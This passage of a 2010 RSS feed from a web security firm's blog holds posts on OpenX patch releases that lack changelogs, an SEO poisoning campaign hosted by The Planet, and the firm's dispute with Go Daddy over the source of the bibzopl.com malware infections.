		<description><![CDATA[OpenX has released a 2.8.7 which patches a vulnerability that could cause OpenX to be compromised. Previous vulnerabilities have led to numerous OpenX installations to be hacked and infected with malware. No detail has been given on what the vulnerability &#8230; <a href="http://www.whitefirdesign.com/blog/2010/09/16/openx-continues-to-release-updates-without-details-of-changes/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>OpenX has released a 2.8.7 which patches a vulnerability that could cause <a href="http://blog.openx.org/09/security-update/">OpenX to be compromised</a>. Previous vulnerabilities have led to numerous OpenX installations to be hacked and infected with malware. No detail has been given on what the vulnerability was or what, if any, other changes were made in this release. The new version does include an updated version of openXVideoAds plugin that patches a <a href="http://forum.openx.org/index.php?showtopic=503487651">vulnerability</a> in an earlier version. Without knowing what the issue or issues that were fixed makes it hard to determine the source of a hacking, potentially leading to new vulnerabilities that are exploited in OpenX going undiagnosed in the future if the OpenX installation hacked was running an out of date version.</p>
<p>OpenX lack of details of changes began with version 2.8.4, which was released in January of 2010. Beginning with that release the only information on changes that have been made is a link to <a href="https://developer.openx.org">https://developer.openx.org</a>. The information about releases in this section of the website  are not complete. The <a href="https://developer.openx.org/jira/browse/OX/fixforversion/11201">listing</a> for Version 2.8.6 list only one item that was fixed, it does not indicate that a fix for a &#8220;<a href="http://forum.openx.org/index.php?showtopic=503483831">potentially serious SQL injection vulnerability</a>&#8221; and bug that caused advertisers to disappear were also patched in the update. The <a href="https://developer.openx.org/jira/browse/OX/fixforversion/11205">listing</a> for 2.8.7 only lists 13 unresolved issues.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/09/16/openx-continues-to-release-updates-without-details-of-changes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>The Planet Hosts Critical Component of SEO Poisoning Campaign</title>
		<link>http://www.whitefirdesign.com/blog/2010/08/16/the-planet-hosts-critical-component-of-seo-poisoning-campaign/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/08/16/the-planet-hosts-critical-component-of-seo-poisoning-campaign/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 19:44:07 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=748</guid>
		<description><![CDATA[The Planet, a large US hosting provider, provides hosting for two websites that are critical for a major SEO poisoning campaign. SEO poisoning involves getting web pages listed in search engines that when accessed attempt to infect the computer with &#8230; <a href="http://www.whitefirdesign.com/blog/2010/08/16/the-planet-hosts-critical-component-of-seo-poisoning-campaign/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>The Planet, a large US hosting provider, provides hosting for two websites that are critical for a major SEO poisoning campaign. SEO poisoning involves getting web pages listed in search engines that when accessed attempt to infect the computer with malware. This <a href="http://www.whitefirdesign.com/resources/security-threat-analysis-seo-poisoning-malware.html">particular campaign</a> involves two sets of hacked websites and the websites hosted by The Planet. The first set of websites has been hacked to display the content from a file requested from either getalllinks.info or dvc44ftgr.com when a page from the hacked website is requested by a search engine. The files from getalllinks.info and dvc44ftgr.com, hosted by The Planet at the IP address 174.133.193.218, include links to pages on the second set of hacked websites. The content of those files can be seen at <a href="http://www.getalllinks.info/links/0.txt">http://www.getalllinks.info/links/0.txt</a> or <a href="http://www.dvc44ftgr.com/links/0.txt">http://www.dvc44ftgr.com/links/0.txt</a>. Search engines crawl those pages on the second set of hacked websites and they get included in search engines results.  When people access the pages through search engines they are redirected to fake anti-virus scanner that attempts to infect their computers with malware. Without the two domains hosted by The Planet the pages on the second set of websites are never crawled and never get included in the search results where the could be accessed by users.</p>
<p>We twice contacted The Planet about the issue and in both cases they took no action. The first time they claimed the issue had been already been resolved and the second time they claimed they could not find anything. We did not receive the same response when we contacted another provided who had been providing service for one of the domains. EveryDNS, which had been providing DNS service for getalllinks.info, shut off the service a day after we contacted them. Two weeks later the domain became active again after the domain starting using DNS service hosted on the same server at The Planet.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/08/16/the-planet-hosts-critical-component-of-seo-poisoning-campaign/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Go Daddy Admits to Not Knowing Source of Malware Infections</title>
		<link>http://www.whitefirdesign.com/blog/2010/05/13/go-daddy-admits-to-not-knowing-source-of-malware-infections/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/05/13/go-daddy-admits-to-not-knowing-source-of-malware-infections/#comments</comments>
		<pubDate>Thu, 13 May 2010 21:08:14 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=741</guid>
		<description><![CDATA[For Several weeks Go Daddy has been blaming the bibzopl.com malware, that has been infecting some Go Daddy hosted websites since February, on users running either outdated versions of WordPress or outdated versions of software installation in general. These are &#8230; <a href="http://www.whitefirdesign.com/blog/2010/05/13/go-daddy-admits-to-not-knowing-source-of-malware-infections/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>For Several weeks Go Daddy has been blaming the <a href="/resources/bibzoplcom-malware.html">bibzopl.com   malware</a>, that has been infecting some Go Daddy hosted websites since February, on users running either <a href="http://www.whitefirdesign.com/news/2010/05/05/go-daddy-again-blames-malware-on-outdated-wordpress-installations/">outdated versions of WordPress</a> or <a href="http://www.whitefirdesign.com/news/2010/05/12/go-daddy-continues-pr-campaign-instead-of-fixing-security-issue/">outdated versions of software installation in general</a>. These are both not true as the malware has infected websites running up to date software and websites not   running any web software, which we and others have been telling Go Daddy. In a <a href="http://community.godaddy.com/groups/web-hosting/forum/topic/found-code-used-to-inject-the-malware-at-godaddy/">topic</a>, in Go Daddy&#8217;s Community Forums, about the code that is causing the website&#8217;s files to become infected a Go Daddy employee using the username ScottG said they are &#8220;currently working on determining the source of the file&#8221;. The employee also claimed that Go Daddy had been aware of the code. It was nearly two weeks ago that they had <a href="http://www.whitefirdesign.com/news/2010/04/30/go-daddy-blames-recent-malware-on-outdated-wordpress-installations/">claimed </a>they had determined source of the infections. No explanation was given why they previously claimed that they had determined the source of the infections and why they have not admitted that their previous information was wrong.  The employee also said that they are having to get help from other hosting provider to secure their own systems.</p>
<p>Here is Go Daddy’s employee entire post:</p>
<blockquote><p>This is information that we have been aware of and are currently working  on determining the source of the file. This is not an issue that is  localized to Go Daddy. Several other hosting companies are seeing this  same attack and we are working with them to determine the source of the  attacks and the best way to mitigate them.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/05/13/go-daddy-admits-to-not-knowing-source-of-malware-infections/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Go Daddy Continues PR Campaign Instead of Fixing Security Issue</title>
		<link>http://www.whitefirdesign.com/blog/2010/05/12/go-daddy-continues-pr-campaign-instead-of-fixing-security-issue/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/05/12/go-daddy-continues-pr-campaign-instead-of-fixing-security-issue/#comments</comments>
		<pubDate>Wed, 12 May 2010 17:21:50 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=733</guid>
		<description><![CDATA[Early this morning a new variant of the bibzopl.com malware, this variant calls a JavaScript file from holasionweb.com, infected a large number of Go Daddy hosted websites. By this morning their PR department had already contacted us again, with continued &#8230; <a href="http://www.whitefirdesign.com/blog/2010/05/12/go-daddy-continues-pr-campaign-instead-of-fixing-security-issue/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Early this morning a new variant of the <a href="/resources/bibzoplcom-malware.html">bibzopl.com  malware</a>, this variant calls a JavaScript file from holasionweb.com, infected a large number of Go Daddy hosted websites. By this morning their PR department had already contacted us again, with continued <a href="http://community.godaddy.com/godaddy/whats-up-with-go-daddy-wordpress-php-exploits-and-malware/">misinformation</a> about the issue. If they eventually decide to work on discovering and fixing the underlying security  issue, instead of running a PR campaign that claims they are secure, the websites would stop getting reinfected.</p>
<p>Go Daddy continues to claim, when not <a href="/news/2010/05/05/go-daddy-again-blames-malware-on-outdated-wordpress-installations/">claiming</a> the issue is due to outdated WordPress installations, that this malware is due to &#8220;Individuals running outdated applications and software&#8221;. As we have <a href="/news/2010/05/03/go-daddy-changes-statement-after-websites-reinfected/">posted before</a> , and Go Daddy is well aware of, the malware has infected websites running up to date software and websites not  running software.</p>
<p>If you are Go Daddy customer who has been infected and is running updated software, we would be  interested to know what response you have received from Go Daddy about  this issue.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/05/12/go-daddy-continues-pr-campaign-instead-of-fixing-security-issue/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Go Daddy Again Blames Malware on Outdated WordPress Installations</title>
		<link>http://www.whitefirdesign.com/blog/2010/05/05/go-daddy-again-blames-malware-on-outdated-wordpress-installations/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/05/05/go-daddy-again-blames-malware-on-outdated-wordpress-installations/#comments</comments>
		<pubDate>Wed, 05 May 2010 17:37:47 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=725</guid>
		<description><![CDATA[In an interview Tuesday, Go Daddy&#8217;s Chief Information Security Officer Todd Redfoot claimed that the bibzopl.com malware that has been infecting some Go Daddy hosted websites was due users with outdated versions of WordPress installed in their account, which were &#8230; <a href="http://www.whitefirdesign.com/blog/2010/05/05/go-daddy-again-blames-malware-on-outdated-wordpress-installations/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>In an<a href="http://www.neowin.net/news/exclusive-wordpress-exploit-explained"> interview</a> Tuesday, Go Daddy&#8217;s Chief Information Security Officer Todd Redfoot claimed that the <a href="/resources/bibzoplcom-malware.html">bibzopl.com   malware</a> that has been infecting some Go Daddy hosted websites was due users with outdated versions of WordPress installed in their account, which were exploited. Last Friday Go Daddy made the same <a href="/news/2010/04/30/go-daddy-blames-recent-malware-on-outdated-wordpress-installations/">claim</a>, but by Monday they were<a href="/news/2010/05/03/go-daddy-changes-statement-after-websites-reinfected/"> claiming</a> that issue was with users running outdated software, not just WordPress. In our contact with them they made they stated that it was not WordPress specific. There was no explanation for the most recent change in the claimed source of the infections.</p>
<p>The malware has infected websites and accounts that did not contain WordPress installations, and websites and accounts that only had WordPress installations running the latest version. There is no reason they should be unaware of this because they <a href="/news/2010/05/04/clearing-up-misinformation-about-go-daddys-malware-issue/">claimed</a> to have &#8220;scanned our 4M hosted sites to identify sites impacted&#8221;, we have mentioned this information in our contact with them, their clients who do not have WordPress installations have been contacting them about the malware, and there are many comments on the Internet from their clients who do not have WordPress installations.</p>
<p>Mr. Reedfoot also stated that Go Daddy first spotted the &#8220;attack&#8221; on May 1, but the malware infections actually began in February and began to infect a large number of websites in April.</p>
<p>Go Daddy&#8217;s continued attempts to deflect the blame for issues within their  own systems will not solve the issue. If they do not discover the actual underlying issue and fix it, websites  could be reinfected with malware.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/05/05/go-daddy-again-blames-malware-on-outdated-wordpress-installations/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Clearing Up Misinformation About Go Daddy&#8217;s Malware Issue</title>
		<link>http://www.whitefirdesign.com/blog/2010/05/04/clearing-up-misinformation-about-go-daddys-malware-issue/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/05/04/clearing-up-misinformation-about-go-daddys-malware-issue/#comments</comments>
		<pubDate>Tue, 04 May 2010 16:58:36 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=717</guid>
		<description><![CDATA[Go Daddy has released another statement about the bibzopl.com malware that has been infecting some Go Daddy hosted websites. The most recent statement continues their misinformation about the issue, while claiming that they are a &#8220;target for speculation and misinformation&#8221; &#8230; <a href="http://www.whitefirdesign.com/blog/2010/05/04/clearing-up-misinformation-about-go-daddys-malware-issue/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Go Daddy has released another statement about the <a href="/resources/bibzoplcom-malware.html">bibzopl.com  malware</a> that has been infecting some Go Daddy hosted websites. The most recent statement continues their misinformation about the issue, while claiming that they are a &#8220;target for  speculation and misinformation&#8221;</p>
<p>The largest piece of misinformation is that the cause of the malware is outdated software whether WordPress, as Go Daddy first<a href="/news/2010/04/30/go-daddy-blames-recent-malware-on-outdated-wordpress-installations/"> blamed</a>, or other software. The malware has infected websites running up to date software and websites not  running any web software. As we have explained, since February, the malware infects files with the  php extension. Many pieces of web software use the .php files, possibly  leading to Go Daddy’s most recent inaccurate identification of the  issue.</p>
<p>In their most recent statement Go Daddy claimed &#8220;both the  prevention and the cure not under<em> </em>&#8221; their control, which is not true. The cause of the infection is due an issue within Go Daddy&#8217;s systems. They are the only ones that can discover and fix the issue.</p>
<p>There has also been misinformation that the malware has infected websites not hosted on Go Daddy. What seems to be causing confusion is that some people are unaware that there are many different hacks and pieces of malware out there, and they are not all related. The <a href="http://www.whitefirdesign.com/resources/binglbaltscom-malware.html">binglblats.com malware</a>, that has been infecting Network Solutions hosted websites due to security issues they have,which has been claimed to the same is unrelated. The vast majority of hacks and malware are due passwords compromised due to password stealing malware on computers, outdated software, SQL injections, and other issues that have nothing to do with hosting providers. This malware has only infected Go Daddy hosted websites.</p>
<p>Here is Go Daddy’s entire statement:</p>
<blockquote><p><strong>Go Daddy Cares! Here&#8217;s some info&#8230;</strong></p>
<p>We do take our position as an Internet leader seriously, especially  when it comes to security. This is why we are going the extra mile to  get the word out. We appreciate your invitation to answer the question, &#8216;<em>What  is Go Daddy doing to help?&#8217;</em></p>
<p>As the world&#8217;s #1 Web host provider, Go Daddy is a logical target for  speculation and misinformation. With this exploitation issue, both the  prevention and the cure <em>are not under our control</em> &#8212; because  the customer decides whether to update the software they run. (If you  think about it, it&#8217;s like forgetting to lock your car and blaming the  auto manufacturer when your car is stolen.) Our job is to help identify  issues and inform our customers about how they can protect their sites.</p>
<p>This is why we are working to proactively communicate and educate  Internet users about this situation.</p>
<p>Here are a few of the initiatives we have going right now.</p>
<p>As a service to our  customers and all Internet users:</p>
<ul>
<li>Go Daddy scanned our 4M hosted sites to identify sites impacted (we  did this immediately upon learning about the issue last week, and again  over the weekend).</li>
<li>Contacting Go Daddy customers impacted by phone and/or email to let  them know how to protect their sites (in some cases, we&#8217;ve alerted them  even before they realize they are impacted).</li>
<li>Go Daddy is also taking the leadership role with educational  communication &#8212; posting Help Articles to our Community &amp; Customer  Service pages to provide &#8220;1,2,3 Info&#8221; on how to properly update  software.<br />
<strong> </strong><br />
We&#8217;ll update the Help Articles as needed and also be posting another  Help Article with actual illustrations/screen shots to make the security  update process easy for even the most remedial of Web users to follow.</li>
</ul>
<p>Phil Stuart<br />
<strong>Go Daddy Communications</strong></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/05/04/clearing-up-misinformation-about-go-daddys-malware-issue/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
	</channel>
</rss>

